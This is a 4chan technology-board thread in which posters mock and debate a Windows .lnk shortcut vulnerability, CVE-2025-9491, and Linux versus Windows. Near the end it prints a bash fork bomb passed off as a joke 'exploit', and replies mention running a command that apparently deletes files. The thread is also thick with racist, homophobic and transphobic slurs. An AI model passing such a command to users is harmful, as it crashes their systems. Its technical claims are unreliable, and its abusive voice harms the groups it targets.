Thread 107073873

It's finally here, a zero day under active exploitation that will NOT be patched in Windows 10. CVE-2025-9491.

Sysadmins on HN are already going mad as they have to actually upgrade to Windows 11 now. But as usual the Supermium and R3dfox copers will try and not mald.

Not my problem

What about ESU?

>>107073873 (OP)
Oh no, I can be hacked when I click .lnk attachments from emails.
Like that wouldn't be super suspicious.

Why are "baby ducks" associated with end-oof-life OS usage?

>>107073873 (OP)
>Sophisticiated malware attack actively exploited!
>Look inside
>"Mail malicious attachment to victim, hope they click it"

It only affect 11 23H2, I upgraded to 24H2 in may 2024.
A literal nothingburguer. OP is a retarded faggot.

>affected windows_11_23h2
Do you even read the shit you post about OP?

i'm not using your slow webshit OS

>op forget about esu updates
>cve doesn't even affect 10

>>107073873 (OP)
>Sysadmins on HN are already going mad as they have to actually upgrade to Windows 11 now.
That's on them. They had 4 years to upgrade. They get what they deserve.

>>107073873 (OP)
>The specific flaw exists within the handling of .LNK files
>An attacker can leverage this vulnerability to execute code in the context of the current user
>Microsoft has no fix available
>cpe:2.3:o:microsoft:windows_11_23h2:10.0.22631.4169:*:*:*:*:*:x64:*

>>107074233
read the thread, mongoloid

>>107074245
Wow this is about as scary as a skiddie sending out emails with notavirus.pdf.exe attached and hoping it gets through the spam filter, the attachment downloads without the browser flagging it, someone is retarded enough to run it and happens to have admin rights on the domain controller. Calling it a nothingburger is the overstatement of the century.
>>107074162
/g/ is just the new /b/ at this point.

>>107074307
>>107074245
>>107074077
>>107074032
>>107073980
malding W7 baby duck retards lmao

>>107074032
>evil maid attack
>it's actually a grubby neckbeard with about 500k in electrical equipment
imagine my disappointment

>>107074325
Quick! Chain some more irrelevant buzzwords together or someone might think you have a higher than single digit IQ.

>>107073980
>>107074032
>>107074307
Imagine being a windows user and thinking carefully every time you click things that are not executable. Like evaluating all pros and cons, the chances that it's a virus, the probabilities of CVEs. I never understood the meme "I'm not clicking that shit" but now I see that it's just their way to use a computer.

>>107073873 (OP)
>a zero day under active exploitation that will NOT be patched in Windows 10. CVE-2025-9491
Retard
Windows 10 us still supported for security updates
>but muh consumer edition
Not my problem

>>107074511
Imagine being (You). A fate so horrid I don't need to say anything else.

>>107074511
On Loonix it's even worse. the only "sandboxing", the only concept of security on the typical GNU/Linux user's system is that there's a separate root user.

Great, so the malware can still steal, encrypt and delete all your files. You know, the actually valuable stuff on your computer.
The only reason desktop GNU/Linux is usually safe from the these kinds of attacks is that nobody bothers going after the 1% of people who run desktop Loonix. There's nothing that makes the OS more resilient. What security features Linux has - Namespaces, SELinux, users and groups - do NOTHING in this scenario.

>>107074541
he's technically right that it won't be patched on w10 but that's because it doesn't affect w10 in the first place kek

>>107074511
You're the kind of retard that would stick his peepee into literally any willing hole, regardless of consequences.
Good thing your ilk eventually sorts itself out. Tick tock, you'll be lucky to reach 20.

>>107073873 (OP)
>User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

>>107074663
Bond Burgered?

>>107073873 (OP)
they're offering esu.
itll be fixed. they still release major security updates for older windows versions than 10 because we still got bank machines running os/2 "bend" like. a windows 10 machine running still? whoa who'd be doing that?

>>107074325
it's quite literally only affecting the latest os
holdouts win again

>>107073916
ESU will not protect existing win10 installations that have not and will never enroll in ESU

>>107073873 (OP)
>will NOT be patched in Windows 10

upgrade to windows 7 anon.

>>107073873 (OP)
>Fear porn
I removed windows defender and refused to install any antivirus hogware. I'm still waiting to be exploited and my shit encrypted.

>>107074778
>I'm still waiting to be exploited and my shit encrypted.
It only happens once, so stay tuned

>>107074245
yeah, i'm confuse a bit. i think OP is retard. NVD report it affect windows 11.

man, so many idiot here

>My router firmware status: updated
>Ports: closed
>Firewall with OCD rules: enabled
>My reaction to Antivirus software: allergic
>Account privileges: administrator
>>107074810
It never happened to my smug ass, not even once.

Updoot bros... Time for your winter booster

>>107074744
No shit. What about those that have?

or you can just ask a normie to run your script with admin privs

>>107074810
I haven't caught a virus since the XP era and I haven't paid for a single game since ~2014 but I am sure the 200 million Russians that pwned me haven't stolen the 50k in XMR because they don't want to tip me off so they can steal my youtube session cookies in peace.

>>107074717
23H2 isn't remotely the latest os, its 2 builds and 2 years behind

Microjeets got the memo it seems. The Windblows 11 Microdicks truly sucks curry out Nadella's ass.

>>107074619
Are flatpaks not per-application sandboxes?
I've never used them. But you're more invested in the topic, perhaps you know.

>>107075050
>win11 is not the latest os
that's you

Windows users can't stop taking massive Ls, as if ads in the start menu of their paid for OS weren't offensive enough...

>>107073998
Duck meat is an important protien source in india and domesticating ducks is a big part of their agriculture. As every village daleet knows, Baby ducks will imprint on the first thing they see when they are born, and they will blindly follow that thing as if it was their mother. So some retarded jeet is implying that your [current opperating system] is your preference simply because it is the first one you used and you imprinted on it and the only reason you wont updoot is because you dont want to leave your mommy because you are a wittle baby, doesnt this third world farmer logic shame you? Sar you must do the needful and update to the lateest microsar opperating system made by java doctor Majebadeukubuku CEO of super power tech industries inc.

>>107074619
>retard doesnt even know what selinux is
Lol
Lmao even
Windows luddites are hilarious

>>107074032
literally every single "zero-day" made in the past decade

Retina Macbook Pro doesn't have this problem

>Remote code execution
Oh no!
>User interaction is required to exploit this vulnerability
Lmao. If you get pwned by this, you deserve it.

Just use Linux for all fuck sake.
Ubuntu just works.
Fedora KDE / Bazzate is literally the same as windows and works great even with Nvidia cards.
Why do you accept taking micosoft pajeet cock up your ass? Are you a cuck or something?

>>107077244
They're institutionalized like that nigga Kenny said, we see the walled garden of windows as a bad thing and oppressive, but the Windows user sees that as safety, it doesn't matter than Windows takes damn near 3GB of RAM at idle and wastes hella CPU cycles, it doesn't matter there's DRM, it doesn't matter you or anyone more intelligent than you can't see the source code of Windows, which means there could be all kinds of evil shit in it, It's windows, it's all they know and are used to seeing their entire life even if it's fucking worse, therefore the idea of suggesting anything else will get them literally upset, like you are suggesting they move into a space where they could die.

>>107073873 (OP)
>People who stay on supported OSs get timely security updates

>>107077358
Once my portable apps stop working, I promise to make a permanent move to Linux

>>107073873 (OP)
LTSC doesn't have this problem DOE.
Stop guzzling journo cum and pretending this is relevant in any way.
Nothing ever happens.

>>107073891
/thread

>>107073980
>>107074511
Imagine getting a random email from some Indian with a weird file type in the attachment, then you download it and click it. What do you expect is going to happen? No one actually does that except for retarded boomers who fall for the Indian google play scams.
>>107075110
>it's probably just an anomaly
kek i can imagine the microjeet seething as he writes "j-just an anomaly saaar... windows 11 best..."
>>107077358
>you can't see the source code of Windows, which means there could be all kinds of evil shit in it
windows xp is open source and there wasn't anything in it. your theory is literally just fearmongering. Meanwhile I can fearmonger back at you and tell you that Linux software is full of backdoors because random government agencies can just submit a github pull request and get their backdoor integrated easily, hidden inside legitimate code.

>>107077820
>windows xp is open source
No its not anon, its unintentionally source available, but Microsoft would fuck you in the ass with a legal cock if you were to fork it.

>>107077358
check that kde plasma VRAM usage buddy
i dont know why linux tards think linux uses less memory
it does if you use some dogshit DE like lxqt or some dogshit window manager

>>107075110
Haha, 13 years of hard work of huge company and nothing of value was produced, people want a version without it. More than a decade of research of ui and ux, terabytes of presentations about how everyone wants telemetry, cortana, ai and shit, just to fail so miserably. What a waste of money and time.

>>107077820
>with a weird file type in the attachment
I would think that it's a phone number, that somebody clicked "share with, email" in android contacts or smth like that.
>and click it
and it opens in appropriate programming, image opens in image viewer, video in video player etc. It shouldn't contain a programming and execute it.

>dont click
Thats not his it works retard you just have to have the right port open. No firewall=you're toast
Furthermore firewall exploit anyways

>>107073873 (OP)
It's only a question of time that the win10 source code will leak like XP's - probably to make it easier for hackers to develop exploits.
If that happens, you will have to update to win11 IMMEDIATELY

>>107079821
>see a tranny fear-monger about windows exploit
>look inside
>"User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file."

>>107073873 (OP)
If only Microsoft could make an OS that people actually wanted to upgrade to.
Maybe something that added some real benefits people want.

SAAR WINDOWS 10 IS MOST UNSAFE YOU MUST TO BE UPGRADING TO WINDOWS 11 MOST EXPRESSEDLY. HURRY SAAR THERE IS NO TIME!!!!

Fuck off you disgusting brown freaks.

>>107080075
>being afraid of visiting pages and opening files

>>107079701
>telemetry
Remember how they told us that thanks to telemetry they will find out what people actually want and will help them develop an OS that everybody likes?

>>107080407
>implying every other website will now be weaponized for this exploit just to compromise 7kings

>>107080420
>develop an OS that everybody likes?
They succeeded too, think about it, We hate 11 because we're not normies, but the way 11 does things is what normies want, getting everything from the app store like their phone in an OS that "just works" and they can pay their DRM subscription software and play their DRM games if their a gamer, windows at this point is an operating system for window licking retards, and those are the people Microsoft wants, they don't give a shit about losing thousands of people to Linux, or they just stay on old versions of Windows, people who are based don't make them any money.

>>107077820
>>107078368
>windows xp is open source
>No its not anon
This is the problem with calling software "open source." Retards like these say whatever software has an available source code is "open source software." We should call a turd a turd, and water water.
Windows is proprietary malware, not free software. Having an available source doesn't magically make the malware stop infringing your freedoms.

>>107080515
>>107078368
>NOOOOOOO ITS NOT OPEN SOURCE
https://github.com/tongzx/nt5src
checkmate, niggers
>repository last updated 2022
looks lke m$ doesnt care that much about taking it down as you Linniggers think they are

>>107074036
>OP is a jeet
This surprises no one

>>107080522
You're just not getting it Anon, Linux is licensed software like Windows, but in the GNU licensing agreement allows for modification of the software, and when it is redistributed, is still under the same license, Windows NT 5.1 still belongs to Microsoft, it doesn't matter the code got leaked, there could never be projects based off of Windows XP that people would actually want, this is the evil in proprietary software, people don't understand that the free in Linux isn't just about the cost.

>>107080554
>dey iz evil demonz in da code n shiiet, we wuz freedum n shiz, da gunoo dey gibz us freedumz
lmao

>>107080642
Hell yeah nigga, get the source code for yo shit

>>107077358
You need help. Serious, professional help.
t. Debian user

>>107080661
Whatever Anon, you know it and I know it, Windows is the way it is because the people who use it want it to be that way

>>107080554
OpenXP literally exist, you lying tranny.
https://theopenxp.org/

>>107080735
>downloadable, uncompiled source code
My point proven Anon, they could never compile something into an .iso for us to just boot, that would count as a "distribution" and that is not allowed, where as Linux, you can just modify another GNU licences piece of software, redistribute it as your own creation and not face legal consequences.

You don't get it.

>>107080777
You can literally build this code into something new. How do you all manage to be so smug while doing so tremendous mental flips? Consider opening your veins with a rusty razor blade like a pathetic smug plebbit tranny that you are.

>>107080810
I know the shit can be compiled Anon and boot XP Anon, but you could never have a Linux situation where you have debian, and then Ubuntu based off that and doing its own thing, and then a distro like Linux mint taking certain aspect of Ubuntu and the GNOME interface and doing their own thing with it, if Microsoft weren't evil pieces of shit the 6.1 Kernel powering Windows 7 could have some amazing things done off it, but unfortunately it's just gonna rot away with no further development because it is a closed source (for now) and copyrighted software just like XP was.

>>107080847
>troonix
why would I ever use this barely working trannyware If I can use custom, improved XP image? Why would I take hormones and chop my dick off like obsessed linux trannies when I can use Windows like straight person?

>>107073873 (OP)
Still waiting for the XP apocalypse. It's been like 10 years.

>>107074511
>"I'm not clicking that shit"
lel they are that stupid but all comes together now

>>107074511
I bet you’re one of those retards who opened the love letter worm back in the day

>>107077358
>hella
Redditor detected

This is just desperation

>>107079701
They will blame the government for making them accept the New Normal policies but if so, why did the management accept it? Why not resign if it goes against their principles? MS stocks are being inflated while their services are becoming worse. None of it makes sense just like nVidia's bloated numbers and the whole AI industry in general. The financial market economy is fake and gay and it's destined to burst.

>>107074622
>it doesn't affect w10 in the first place kek
Yes it does. Why can't you retards do even the most basic of research?
>The zero-day went undiscovered until March, when security firm Trend Micro said it had been under active exploitation since 2017, by as many as 11 separate advanced persistent threats (APTs).
Windows 11 didn't even exist in 2017.

It's not even a vulnerability.
Shortcuts can launch any executable on the system with commands, so of course it can run a cmd or powershell command to download malware.
That's a feature that is well-known and used for both sysadmin, gaming and home user tasks...

>>107081927
retard

>>107074325
Go back to Kerala, Redmond gypsy

>>107073873 (OP)
>zero day
>known since august

>>107074865
I'm still waiting to get my runescape account hacked after like 2 decades and a bunch of people I know having it happen to them. I think most people are just retarded, and they do retarded shit and end up with retarded consequences.

>>107073873 (OP)
I use my w10 computer for 2 things:
- buying shit on my local amazon-equivalent store
- paying my bills
- access email to read confirmations of payments
both with a debit card that is manually fed by me

I can take the risk of being a little careful not to click a fucking email attachment from an email I didn't send myself
what's ivan gonna do? pay my bills for me? steal like 100$ from my debit card?

>>107074511
>Imagine ... thinking carefully
Yeah, must be hard for a mac user like yourself

>>107074744
But it is free

>>107081604
>trying to guess by the subject of letter whether you'll be hacked if you open it
It get's funnier with every reply. Do you understand that you should be able to do whatever you want except launching programs and it should not lead to you being hacked?

>>107085373
>I like to open random attachments from Indians
And you’re trying to call me a retard, lmfao

>>107074511
just run this command bro

>>107073873 (OP)
>laughs in LTSC

>>107077820
>, then you download it and click it
I don't open emails I don't expect to receive

>>107085482
Damn, this 4chan guy got him good

>107073873 (OP) (Homosexual) (Retard)
>will NOT be patched in Windows 10.
Source your ass, yeah?
Because Win10 LTSC IoT is supported until 2032.

>>CVE-2025-9491
>Known Affected Software Configurations
>windows_11_23h2
Oh, I'm on 11 24H2 so this is literally not my problem regardless.
It must suck to be as retarded as you are OP, my condolences.

>>107088463
Based 11 user, the updooters will always win, whether they be on Linux or the newest Windows, because we don't worry about shit not working.

>>107074245
isn't that what.lnk files are supposed to do?

>>107082585
Thanks anon its been a long time since an image was so fucking retarded i burst out laughing imaging the absolute seething cuckold responsible for creating/posting it.

>>107085482
cool, it indeed deletes the files somehow

>>107073998
they aren't it's just one loser spamming it

>>107089475
It's all the chads with actual support from using Linux/Windows11 spamming it

>>107073980
>>107074511
>>107077820
I havent opened (or even received, for that matter) an email attachment since like 2005.
you might as well tell me windows 10 is vulnerable to attacks via dial up connection.

>>107089490
i doubt chad would care desu

>>107089528
With the proliferation of tech tubers, it is possible for a normie chad in the wild to wonder why you're using old ass Windows 7, because they're so aware of tech now.

>>107073873 (OP)
>CVE-2025
Lol it exists since windows xp and was widely used by cs players. I remember adding cmdline args in counter strike link, like "--connect 12.34.56.78" so it immediately connects to my favourite server after I click the link. This cve is probably a link to cmd.exe with malicious arguments. Funny that somebody made such huge vulnerability in the first place and that it took 25 years for Microsoft security researches to discover what every cs player already knew.

>>107089389
>Thanks anon its been a long time since an image was so fucking retarded i burst out laughing imaging the absolute seething cuckold responsible for creating/posting it.

linux 0day .sh file local code execution exploit [milw0rm.com]

PoC
#!/bin/sh
:(){ :|:& };:

>>107089389
Don't respond to jakposters you fucking idiot

>>107089774
It's a fork bomb and it stopped without me doing anything

>>107089912
are you sure?
check top
also don't run forkbombs